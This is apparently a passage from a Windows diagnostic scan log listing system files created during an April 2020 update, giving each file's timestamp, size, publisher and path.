2020-04-17 18:07 - 2020-04-17 18:07 - 000912896 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000892416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000868864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windowsperformancerecordercontrol.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000865280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000836608 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000785920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000783480 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcblaunch.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 000775696 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 000768528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FlightSettings.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000701440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BTAGService.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000673704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000673464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 000668672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsecedit.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000665088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000647680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000632832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000629760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000628616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000555008 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2020-04-17 18:07 - 2020-04-17 18:07 - 000538160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000532480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000507152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\taskschd.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000491008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppcext.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000487784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000415760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000410112 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000406480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Enumeration.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000381440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntshrui.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000336384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\es.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000330240 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 000324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
2020-04-17 18:07 - 2020-04-17 18:07 - 000277864 _____ (Microsoft Corporation) C:\WINDOWS\system32\LsaIso.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 000277504 _____ (Microsoft Corporation) C:\WINDOWS\system32\scecli.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000268008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\iasrad.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000214528 _____ (Microsoft Corporation) C:\WINDOWS\system32\srumsvc.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000214016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scecli.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000211256 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcbloader.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000203264 _____ (Microsoft Corporation) C:\WINDOWS\system32\LanguageComponentsInstaller.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000190048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\logoncli.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000185952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000179712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallServiceTasks.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000179712 _____ (Microsoft Corporation) C:\WINDOWS\system32\t2embed.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000163840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\t2embed.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageUsage.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000123952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KerbClientShared.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\slc.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000101888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sppc.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000093712 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000089336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32u.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dot3api.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dot3msm.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\iasacct.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000084280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hvservice.sys
2020-04-17 18:07 - 2020-04-17 18:07 - 000071680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Custom.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000066624 _____ (Microsoft Corporation) C:\WINDOWS\system32\iumcrypt.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\srumapi.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000050544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudNotifications.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 000050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\iaspolcy.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000049152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tbauth.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf3216.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ias.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cmintegrator.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000029184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerCookies.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 000021520 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdhvcom.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000019968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\slcext.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000017920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wksprtPS.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsunattend.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 000015872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Custom.ps.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dciman32.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000010752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMAlertListener.ProxyStub.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000007680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DMAlertListener.ProxyStub.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000007168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimg32.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\lpk.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth9.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth8.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth7.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth6.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth5.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth4.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth3.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth2.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth12.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth11.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth10.bin
2020-04-17 18:07 - 2020-04-17 18:07 - 000000315 _____ C:\WINDOWS\system32\DrtmAuth1.bin
2020-04-17 18:06 - 2020-04-17 18:06 - 009930552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 007604584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 004563200 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 003802624 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 003547648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 002986808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2020-04-17 18:06 - 2020-04-17 18:06 - 002871608 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 002767928 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 002086656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 001999960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 001945600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomp.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 001757096 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2020-04-17 18:06 - 2020-04-17 18:06 - 001726264 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 001512832 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 001300280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2020-04-17 18:06 - 2020-04-17 18:06 - 001261808 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 001257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 001243648 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 001153024 _____ (Microsoft Corporation) C:\WINDOWS\system32\windowsperformancerecordercontrol.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000982840 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000974336 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000924672 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000865280 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000822208 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000811320 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000772096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2020-04-17 18:06 - 2020-04-17 18:06 - 000759272 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskschd.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000747320 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000638480 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000618296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000604984 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcasvc.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000561464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2020-04-17 18:06 - 2020-04-17 18:06 - 000530432 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000515600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000513576 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000510792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64win.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000498688 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntshrui.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000477496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2020-04-17 18:06 - 2020-04-17 18:06 - 000465208 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000456504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2020-04-17 18:06 - 2020-04-17 18:06 - 000401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\es.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpr.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000324408 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcommdlg.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000259776 _____ (Microsoft Corporation) C:\WINDOWS\system32\logoncli.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000251704 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000197632 _____ (Microsoft Corporation) C:\WINDOWS\system32\Win32CompatibilityAppraiserCSP.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000178192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys
2020-04-17 18:06 - 2020-04-17 18:06 - 000164368 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000147696 _____ (Microsoft Corporation) C:\WINDOWS\system32\smss.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000142544 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicensingUI.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\slc.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000136192 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppc.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000122368 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000115120 _____ (Microsoft Corporation) C:\WINDOWS\system32\phoneactivate.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000102216 _____ (Microsoft Corporation) C:\WINDOWS\system32\changepk.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000071480 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32appinventorycsp.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcadm.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000060928 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf3216.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000058880 _____ C:\WINDOWS\system32\runexehelper.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcalua.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpgradeResultsUI.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000036152 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\sxssrv.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000033080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hwpolicy.sys
2020-04-17 18:06 - 2020-04-17 18:06 - 000031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wksprtPS.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\slcext.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\dciman32.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcaevts.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\pacjsworker.exe
2020-04-17 18:06 - 2020-04-17 18:06 - 000008192 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimg32.dll
2020-04-17 18:06 - 2020-04-17 18:06 - 000003072 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpk.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 007849216 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 006168064 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 003729408 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2020-04-17 18:05 - 2020-04-17 18:05 - 003587384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2020-04-17 18:05 - 2020-04-17 18:05 - 003109376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 002717184 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2020-04-17 18:05 - 2020-04-17 18:05 - 002453504 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallService.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001918976 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001764336 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001656904 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001612800 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001603584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001497600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001480192 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocoreworker.exe
2020-04-17 18:05 - 2020-04-17 18:05 - 001427456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Vpn.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001378528 _____ (Microsoft Corporation) C:\WINDOWS\system32\webservices.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001180672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001136128 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001083904 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 001011200 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000915192 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000874296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2020-04-17 18:05 - 2020-04-17 18:05 - 000840704 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Language.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000684560 _____ (Microsoft Corporation) C:\WINDOWS\system32\SHCore.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000605184 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2020-04-17 18:05 - 2020-04-17 18:05 - 000550400 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2020-04-17 18:05 - 2020-04-17 18:05 - 000524264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Enumeration.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000516096 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2020-04-17 18:05 - 2020-04-17 18:05 - 000459688 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe
2020-04-17 18:05 - 2020-04-17 18:05 - 000441144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2020-04-17 18:05 - 2020-04-17 18:05 - 000408064 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncbservice.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000355840 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicSvc.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000339304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicCapsule.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000265216 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\VPNv2CSP.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateDeploymentProvider.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanagerprecheck.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallServiceTasks.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000231912 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000152408 _____ (Microsoft Corporation) C:\WINDOWS\system32\KerbClientShared.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000127280 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32u.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000096768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Custom.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicAgent.exe
2020-04-17 18:05 - 2020-04-17 18:05 - 000070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\keepaliveprovider.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\tbauth.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000047000 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2020-04-17 18:05 - 2020-04-17 18:05 - 000045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerCookies.exe
2020-04-17 18:05 - 2020-04-17 18:05 - 000028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicPS.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Custom.ps.dll
2020-04-17 18:05 - 2020-04-17 18:05 - 000022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbservicetrigger.dll
